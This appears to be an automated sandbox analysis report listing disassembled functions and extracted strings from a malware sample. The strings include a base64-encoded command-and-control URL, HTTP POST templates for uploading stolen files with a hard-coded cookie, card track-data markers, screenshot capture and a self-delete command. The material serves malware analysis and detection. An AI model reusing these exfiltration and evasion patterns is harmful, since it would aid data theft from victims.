                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040136D
                                                                                                                                                                                                                                                                                            • Thread32First.KERNEL32(00000000,?), ref: 0040138B
                                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0040139C
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004013A7
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,00000200), ref: 004013CB
                                                                                                                                                                                                                                                                                            • Thread32Next.KERNEL32(?,00000010), ref: 00401416
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 00401427
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CurrentThread32$AllocCloseCreateFirstHandleHeapNextProcessSnapshotThreadToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1603055512-0
                                                                                                                                                                                                                                                                                            • Opcode ID: af1bdede72f19ddb88b9d4dd44391aa6c563041bf97d6c8c9605e24efd9b8436
                                                                                                                                                                                                                                                                                            • Instruction ID: a46b4483c7b8a11f0172a98b4f0046a6093f5fbd21dcca2acf5bbb94b3727895
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af1bdede72f19ddb88b9d4dd44391aa6c563041bf97d6c8c9605e24efd9b8436
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4213D70500205DFEB208FA4DD89AAAB7B5FB04305F10863EE556F26F0D7749841CB28
                                                                                                                                                                                                                                                                                            Function 0040A3E6 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040A44F
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040A465
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040A502
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040A529
                                                                                                                                                                                                                                                                                            • _wcsicmp.MSVCRT ref: 0040A550
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040A566
                                                                                                                                                                                                                                                                                            • _wcsicmp.MSVCRT ref: 0040A57F
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 0040A5E3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: wsprintf$_wcsicmp$AllocVirtual_endthreadex
                                                                                                                                                                                                                                                                                            • String ID: %ls\%d%d.%ls$%ls\%d%d.exe$%s %S$/s %s$dll$exec&%S$regsvr32$vbs$wscript
                                                                                                                                                                                                                                                                                            • API String ID: 1107127829-2164475476
                                                                                                                                                                                                                                                                                            • Opcode ID: 3bb7dd00f52e421adf8aa78cbce0d07f9c473fe1d7ebe579c55aee274f382f72
                                                                                                                                                                                                                                                                                            • Instruction ID: b481ad22742ac5d54984b1c6fda5b09a00c60f1e46715cb6cdbbe7297d3e5299
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bb7dd00f52e421adf8aa78cbce0d07f9c473fe1d7ebe579c55aee274f382f72
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F51B032548304AFD701BF25EC02A6F7B95EF84315F10893FF984B61D2DA7A89158B9B
                                                                                                                                                                                                                                                                                            Function 00407795 Relevance: 22.6, APIs: 3, Strings: 12, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: wcscpy$wcscat
                                                                                                                                                                                                                                                                                            • String ID: %20(32-bit)$%20(64-bit)$N/A$Windows%2010$Windows%202000$Windows%202003$Windows%207$Windows%208$Windows%208.1$Windows%20NT$Windows%20Vista$Windows%20XP
                                                                                                                                                                                                                                                                                            • API String ID: 1648490730-201823473
                                                                                                                                                                                                                                                                                            • Opcode ID: db90e47feef2e945943bc22b84149409bc0b9ed49b1f49d46305809d478a1a78
                                                                                                                                                                                                                                                                                            • Instruction ID: d6871911b6e28be7e670e754a52c19a4fe27a3756fb0170673ef9cef492ad0b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db90e47feef2e945943bc22b84149409bc0b9ed49b1f49d46305809d478a1a78
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2317433E48208D6DF24E754D98ABE97264A711754F2086B7E506B22C0D67CFE85CA8F
                                                                                                                                                                                                                                                                                            Function 00402500 Relevance: 18.4, APIs: 6, Strings: 6, Instructions: 355COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                                            • String ID: ;$?$?$P$Track1$Track2
                                                                                                                                                                                                                                                                                            • API String ID: 2221118986-1157550184
                                                                                                                                                                                                                                                                                            • Opcode ID: 168034bfa4ee5d13975dbda2c5989fd9011b117aa1260e9c9f5f99c70a7a6302
                                                                                                                                                                                                                                                                                            • Instruction ID: e96c9378b95773dee0a483c2d7e6947cd4ab51d7628724ba882f998f2e0c0245
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 168034bfa4ee5d13975dbda2c5989fd9011b117aa1260e9c9f5f99c70a7a6302
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41C12671C00248AEEF119AB48E4CBEE7B68EF55354F24417BE844762C1D7BC4B868769
                                                                                                                                                                                                                                                                                            Function 0040AAE9 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040AB0D
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040AB2D
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040AB49
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040AB9F
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040ABE1
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,%s /c del %s,?,?), ref: 0040AC12
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040AA73: memset.MSVCRT ref: 0040AA94
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040AA73: memset.MSVCRT ref: 0040AAAB
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040AA73: wsprintfW.USER32 ref: 0040AACF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset$wsprintf$CurrentLibraryLoadProcess
                                                                                                                                                                                                                                                                                            • String ID: %s /c del %s$COMSPEC$D
                                                                                                                                                                                                                                                                                            • API String ID: 277931332-2460376804
                                                                                                                                                                                                                                                                                            • Opcode ID: ee50f0230a7024b79151c7fca479acf4555080f5941d415d608127d23faa52fc
                                                                                                                                                                                                                                                                                            • Instruction ID: 9a000a42536d7a745db068e817f025c7df3bec6bdb1ac414e77931bb60ab556d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee50f0230a7024b79151c7fca479acf4555080f5941d415d608127d23faa52fc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D541A9B25043406BD320EBB6DC49DAF779CDF84714F00093EB699E6181DA78DA09C7A6
                                                                                                                                                                                                                                                                                            Function 004047C6 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040482C
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040486E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 004048B8
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004048D6
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040493F
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00404980
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memsetwsprintf$AllocLibraryLoadVirtual_endthreadexwcsstr
                                                                                                                                                                                                                                                                                            • String ID: %ls %ls$log&%ls&%ls&p&%ls
                                                                                                                                                                                                                                                                                            • API String ID: 358198565-3976585153
                                                                                                                                                                                                                                                                                            • Opcode ID: 1f8776c272fb005b4c6e051bb7459ca1da05a0c4f706097a2d8896626758e320
                                                                                                                                                                                                                                                                                            • Instruction ID: 5b204e8dd206c5cf91682a8e6da0635c17dfc8515db03ed3d213893d12788448
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f8776c272fb005b4c6e051bb7459ca1da05a0c4f706097a2d8896626758e320
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3541F8B2900108BAEB11BBB1DD46FEF7768EF80304F10057FF604B61C2EA7D5A454659
                                                                                                                                                                                                                                                                                            Function 00408F76 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(GdiPlus.dll,GdipCreateBitmapFromHBITMAP), ref: 00408F9B
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00408FA4
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(GdiPlus.dll,GdipSaveImageToFile), ref: 00408FB7
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00408FBA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                            • String ID: 2$GdiPlus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToFile
                                                                                                                                                                                                                                                                                            • API String ID: 1646373207-199102230
                                                                                                                                                                                                                                                                                            • Opcode ID: 3ca8e2c1e255ed1e8f7765633dfa9f114379a59cb46518c24592d80fd588fbc7
                                                                                                                                                                                                                                                                                            • Instruction ID: 589fc684528d22baab4eb2ee89da4a59c0b32a3b3ae3daf64a8cf6386668b0ad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ca8e2c1e255ed1e8f7765633dfa9f114379a59cb46518c24592d80fd588fbc7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D1119B1D00219EACB119FE5CD84ADEBBBDBF48354F10417BE914F2290D7789A098B64
                                                                                                                                                                                                                                                                                            Function 00409ECA Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,00000000,00404AD6,00000000,-00000004,00000000,00000000,-00000004,00000104,?,00404AD6,00000000,-00000004,?), ref: 00409ED6
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,sprintf), ref: 00409EEC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • sprintf, xrefs: 00409EE6
                                                                                                                                                                                                                                                                                            • _wv=%s, xrefs: 0040A039
                                                                                                                                                                                                                                                                                            • POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s, xrefs: 0040A06A
                                                                                                                                                                                                                                                                                            • ntdll.dll, xrefs: 00409ED1
                                                                                                                                                                                                                                                                                            • ff&%ls&%ls&%s&%s&%i, xrefs: 00409FED
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                                                                                                                                                            • String ID: POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s$_wv=%s$ff&%ls&%ls&%s&%s&%i$ntdll.dll$sprintf
                                                                                                                                                                                                                                                                                            • API String ID: 3695083113-3352186294
                                                                                                                                                                                                                                                                                            • Opcode ID: 2e06a92000f3f459d28d1244bb7f8cd70b03360f78f6139414a1c17f2dadd28e
                                                                                                                                                                                                                                                                                            • Instruction ID: 60402d10bb5f95850af81384687696959107d19452cb3fe7a62df9f1c819f059
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e06a92000f3f459d28d1244bb7f8cd70b03360f78f6139414a1c17f2dadd28e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D51C6B1C04218AAEF017FB1DD468EFBBB9AF54305B11403FF900B21D2DB7E4A158A69
                                                                                                                                                                                                                                                                                            Function 00409BA4 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00409BB2
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,sprintf), ref: 00409BC8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • sprintf, xrefs: 00409BC2
                                                                                                                                                                                                                                                                                            • _wv=%s, xrefs: 00409CF0
                                                                                                                                                                                                                                                                                            • plugin&%ls&%ls&%s&%s, xrefs: 00409CA3
                                                                                                                                                                                                                                                                                            • POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s, xrefs: 00409D21
                                                                                                                                                                                                                                                                                            • ntdll.dll, xrefs: 00409BAD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                                                                                                                                                            • String ID: POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s$_wv=%s$ntdll.dll$plugin&%ls&%ls&%s&%s$sprintf
                                                                                                                                                                                                                                                                                            • API String ID: 3695083113-595867970
                                                                                                                                                                                                                                                                                            • Opcode ID: 2a0336903ed28a33660f9da3f3c99a21c4a7ae50ce80402e0d43ec7b37675c82
                                                                                                                                                                                                                                                                                            • Instruction ID: 087c7b39e7903d605c7e5286878b6e50816404ce0fe47a3c9abd54429710ce82
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a0336903ed28a33660f9da3f3c99a21c4a7ae50ce80402e0d43ec7b37675c82
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F51B5B2C44218BEEF057BB1DD4A8FEBBB8EE44315B10403FF500B61C2DA7D5A418A68
                                                                                                                                                                                                                                                                                            Function 00406B90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138synchronizationthreadstringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040684A: strlen.MSVCRT ref: 00406854
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040684A: StrCmpNA.SHLWAPI(?,POST,00000000), ref: 00406860
                                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,), ref: 00406BDB
                                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 00406C12
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040A13C,00000000,00000000,00000000), ref: 00406C7D
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00406C86
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040A13C,00000000,00000000,00000000), ref: 00406CE7
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00406CF0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateObjectSingleThreadWaitstrlen$AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2591684496-2344752452
                                                                                                                                                                                                                                                                                            • Opcode ID: 4134e3e3e27c11381cc6432724dd2b74fe9533b3ff24f782e92f8c78223b0c8f
                                                                                                                                                                                                                                                                                            • Instruction ID: 808541e188ed4cd89f6ec13a161f957f63ed6102ad404da529229d2523cbe5da
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4134e3e3e27c11381cc6432724dd2b74fe9533b3ff24f782e92f8c78223b0c8f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B41D8B2900215AFDB107FB59C8995EB7A8AF44318B06813BFA05B7281D6799D20C798
                                                                                                                                                                                                                                                                                            Function 00402D51 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=, xrefs: 00402D58
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: toupper
                                                                                                                                                                                                                                                                                            • String ID: aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=
                                                                                                                                                                                                                                                                                            • API String ID: 3566517832-1689639315
                                                                                                                                                                                                                                                                                            • Opcode ID: 802625297930aff3560f26b9a70184b5b480969580bf75b6449719d799e32ffe
                                                                                                                                                                                                                                                                                            • Instruction ID: a48f569b21719a1f86f71e86e4a7c331d02e31fd6c7badc472a8797e518b5431
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 802625297930aff3560f26b9a70184b5b480969580bf75b6449719d799e32ffe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44219270E042699FCF00DBF899D85AEBFF8AF09251B1005BBD401E7281E6788E41CB94
                                                                                                                                                                                                                                                                                            Function 00408B72 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004064D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00407DFB,000000FF,00000000,00000000,00000000,00000000,753C73E0,00000206,00000000,?,?,00407DFB,?), ref: 004064E9
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 004088C0
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 004088D4
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 004088EB
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 004088F6
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040887B: strstr.MSVCRT ref: 00408903
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 00408C44
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00408C80
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00408C95
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 00408CF8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • POST %s HTTP/1.0Host: %sCookie: auth=bc00595440e801f8a5d2a2ad13b9791b;uid=%lsUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-Type: multipart/form-data; boundary=---------------------------%dContent-Length: , xrefs: 00408CF2
                                                                                                                                                                                                                                                                                            • -----------------------------%dContent-Disposition: form-data;name="fname"%ls-----------------------------%dContent-Disposition: form-data; name="data"; filename="%ls"Content-Type: application/octet-stream, xrefs: 00408C7A
                                                                                                                                                                                                                                                                                            • -----------------------------%d, xrefs: 00408C3E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: strstr$sprintf$ByteCharMultiSleepWidewsprintf
                                                                                                                                                                                                                                                                                            • String ID: -----------------------------%d$-----------------------------%dContent-Disposition: form-data;name="fname"%ls-----------------------------%dContent-Disposition: form-data; name="data"; filename="%ls"Content-Type: application/octet-stream$POST %s HTTP/1.0Host: %sCookie: auth=bc00595440e801f8a5d2a2ad13b9791b;uid=%lsUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-Type: multipart/form-data; boundary=---------------------------%dContent-Length:
                                                                                                                                                                                                                                                                                            • API String ID: 1631555295-2459763480
                                                                                                                                                                                                                                                                                            • Opcode ID: bad85a6fd40427c1e6478a6947043c0355f1b39d6532cdeb3166bcddc944f8ad
                                                                                                                                                                                                                                                                                            • Instruction ID: ad8ec8c98f77bd44cec04117c3abe5ee4421dba4810e898ccc20856f11a99f70
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad85a6fd40427c1e6478a6947043c0355f1b39d6532cdeb3166bcddc944f8ad
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB51F3B2C00208BBDF11ABE5DD469EF7BB8EF84314F15013EF950B61C1EA3959558B68
                                                                                                                                                                                                                                                                                            Function 004095B7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040A1D2: GetModuleHandleW.KERNEL32(ntdll.dll,?,00001B7C,00000000,?,004095E8,?,?), ref: 0040A1EB
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00409707
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                              • Part of subcall function 004046F2: memset.MSVCRT ref: 0040470B
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 00409683
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
